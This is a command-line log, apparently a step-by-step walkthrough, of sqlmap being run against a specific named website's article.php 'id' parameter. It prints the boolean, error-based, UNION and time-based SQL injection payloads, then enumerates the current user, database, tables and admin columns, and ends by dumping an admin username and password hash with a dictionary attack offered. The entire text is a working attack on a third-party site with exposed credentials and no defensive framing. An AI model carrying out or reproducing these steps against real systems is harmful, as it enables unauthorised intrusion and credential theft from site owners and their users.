D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name */
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* Current database */
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* Get the table names of the current database */
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* Get the column names of the admin table */
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* Get the contents of the columns */
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap>